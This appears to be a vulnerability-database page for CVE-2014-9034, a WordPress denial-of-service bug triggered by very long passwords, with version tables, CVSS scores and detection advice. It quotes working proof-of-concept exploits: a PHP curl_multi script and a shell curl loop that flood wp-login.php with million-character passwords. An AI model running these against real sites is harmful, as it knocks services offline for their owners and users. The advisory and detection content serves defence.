CVE-2014-9034
published 2014-11-25CVE-2014-9034: wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial…
PriorityP346medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
83.16%
99.6th percentile
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
Affected
15 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | < wordpress 4.0.1+dfsg-1 (bookworm) | wordpress 4.0.1+dfsg-1 (bookworm) |
| wordpress | wordpress | <= 3.7.4 | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | — | — |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
| wordpress | wordpress | >= 0 < 4.0.1+dfsg-1 | 4.0.1+dfsg-1 |
Detection & IOCsextracted from sources · hover to see the quote
commandfor i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done↗
- →Detect DoS attempts by monitoring for POST requests to /wp-login.php with extremely large password field values (e.g., 1,000,000 characters/bytes), which trigger excessive CPU consumption in the phpass hashing routine. ↗
- →Alert on high-frequency concurrent POST requests to /wp-login.php from the same source IP, consistent with the exploit pattern of spawning ~150 parallel curl requests with short sleep intervals. ↗
- →Flag POST requests to /wp-login.php where the Content-Length or body size exceeds a reasonable threshold (e.g., >4096 bytes), as the attack relies on submitting a password of up to 1,000,000 characters. ↗
- →Monitor for the legacy/suspicious User-Agent string used in the PHP-based PoC exploit when targeting wp-login.php. ↗
- →Spike in CPU consumption on the WordPress server correlating with bursts of login POST requests is a key behavioral indicator of this DoS vulnerability being exploited. ↗
- ·The vulnerability exists specifically in wp-includes/class-phpass.php and affects WordPress versions before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1. Detection rules should be scoped to unpatched instances. ↗
- ·The exploit can be performed with a valid WordPress user account, meaning authentication-based rate limiting alone is insufficient — the attack succeeds before the password is validated. ↗
- ·The PHP-based PoC uses curl_multi to send concurrent requests in a loop, meaning the attack traffic may appear distributed across multiple handles from a single process, potentially evading simple per-connection rate limits. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv5.0MEDIUM
vendor_debian5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2014-9034: wordpress - wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9....
vendor_debian·2014·CVSS 5.0
CVE-2014-9034 [MEDIUM] CVE-2014-9034: wordpress - wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9....
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
Scope: local
bookworm: resolved (fixed in 4.0.1+dfsg-1)
bullseye: resolved (fixed in 4.0.1+dfsg-1)
forky: resolved (fixed in 4.0.1+dfsg-1)
sid: resolved (fixed in 4.0.1+dfsg-1)
trixie: resolved (fixed in 4.0.1+dfsg-1)
GHSA
GHSA-wh45-5f5h-v3mq: wp-includes/class-phpass
ghsa_unreviewed·2022-05-17·CVSS 5.0
CVE-2014-9034 [MEDIUM] GHSA-wh45-5f5h-v3mq: wp-includes/class-phpass
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
OSV
CVE-2014-9034: wp-includes/class-phpass
osv·2014-11-25·CVSS 5.0
CVE-2014-9034 [MEDIUM] CVE-2014-9034: wp-includes/class-phpass
wp-includes/class-phpass.php in WordPress before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1 allows remote attackers to cause a denial of service (CPU consumption) via a long password that is improperly handled during hashing, a similar issue to CVE-2014-9016.
No detection rules found.
Exploit-DB
WordPress Core 4.0 - Denial of Service
exploitdb·2014-12-01·CVSS 5.0
CVE-2014-9034 [MEDIUM] WordPress Core 4.0 - Denial of Service
WordPress Core 4.0 - Denial of Service
---
$argv[2],
'pwd' => str_repeat("A",1000000),
'redirect_to' => $argv[1] . "/wp-admin/",
'reauth' => 1,
'testcookie' => '1',
'wp-submit' => "Log%20In");
$cookieFiles = "cookie.txt";
curl_setopt_array($ch, array(
CURLOPT_HEADER => 1,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
CURLOPT_REFERER => $argv[1] . "/wp-admin/",
CURLOPT_COOKIEJAR => $cookieFiles,
CURLOPT_COOKIESESSION => true,
CURLOPT_URL => $argv[1] . '/wp-login.php',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_FOLLOWLOCATION => true));
curl_multi_add_handle($multi, $ch);
$channels[$x] = $ch;
}
$active = null;
do {
$mrc = curl_multi_exec($multi, $active);
} while (
Exploit-DB
WordPress Core < 4.0.1 - Denial of Service
exploitdb·2014-12-01
CVE-2014-9034 WordPress Core < 4.0.1 - Denial of Service
WordPress Core valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload
Perform a Dos with a valid user:
for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep
0.25; done
Authors:
-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info
References:
* https://wordpress.org/news/2014/11/wordpress-4-0-1/
* https://www.drupal.org/SA-CORE-2014-006
*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
* http://www.devconsole.info/?p=1050
http://advisories.mageia.org/MGASA-2014-0493.htmlhttp://core.trac.wordpress.org/changeset/30467http://openwall.com/lists/oss-security/2014/11/25/12http://www.debian.org/security/2014/dsa-3085http://www.mandriva.com/security/advisories?name=MDVSA-2014:233http://www.securitytracker.com/id/1031243https://wordpress.org/news/2014/11/wordpress-4-0-1/http://advisories.mageia.org/MGASA-2014-0493.htmlhttp://core.trac.wordpress.org/changeset/30467http://openwall.com/lists/oss-security/2014/11/25/12http://www.debian.org/security/2014/dsa-3085http://www.mandriva.com/security/advisories?name=MDVSA-2014:233http://www.securitytracker.com/id/1031243https://wordpress.org/news/2014/11/wordpress-4-0-1/
2014-11-25
Published